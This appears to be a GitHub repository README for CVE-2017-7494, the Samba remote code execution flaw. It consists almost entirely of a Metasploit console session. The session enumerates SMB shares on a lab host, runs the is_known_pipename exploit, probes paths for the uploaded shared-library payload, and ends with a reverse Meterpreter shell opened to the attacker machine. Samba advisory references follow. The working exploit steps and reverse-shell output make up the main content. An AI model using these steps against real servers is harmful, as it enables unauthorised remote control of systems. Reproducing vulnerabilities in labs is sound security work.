Skip to content

Latest commit

 

History

History

CVE-2017-7494

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
README.md
README.md
 
 
cve-2017-7494.pcap
cve-2017-7494.pcap
 
 
smb.conf
smb.conf
 
 

README.md

CVE-2017-7494

msf > use auxiliary/scanner/smb/smb_enumshares
msf auxiliary(smb_enumshares) > set RHOSTS 192.168.206.144
RHOSTS => 192.168.206.144
msf auxiliary(smb_enumshares) > run

[+] 192.168.206.144:139   - print$ - (DISK) Printer Drivers
[+] 192.168.206.144:139   - CVE20177494 - (DISK) CVE20177494
[+] 192.168.206.144:139   - IPC$ - (IPC) IPC Service (Samba 4.5.2-Debian)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(smb_enumshares) > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > set RHOST 192.168.206.144
RHOST => 192.168.206.144
msf exploit(is_known_pipename) > set target 0
target => 0
msf exploit(is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOST           192.168.206.144  yes       The target address
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_BASE                   no        The remote filesystem path correlating with the SMB share name
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.206.1:4444
[*] 192.168.206.144:445 - Using location \\192.168.206.144\CVE20177494\ for the path
[*] 192.168.206.144:445 - Hunting for payload using common path names: VZiaULDJ.so - //192.168.206.144/CVE20177494/
[*] 192.168.206.144:445 - Trying location /volume1/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume1/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume1/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume1/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /tmp/VZiaULDJ.so...
[*] Sending stage (797784 bytes) to 192.168.206.144
[*] Meterpreter session 1 opened (192.168.206.1:4444 -> 192.168.206.144:58682) at 2017-05-26 05:52:19 -0500

meterpreter >

References

  1. https://www.samba.org/samba/security/CVE-2017-7494.html
  2. rapid7/metasploit-framework#8450
  3. https://download.samba.org/pub/samba/
  4. https://wiki.samba.org/index.php/Build_Samba_from_Source
  5. https://github.com/omri9741/cve-2017-7494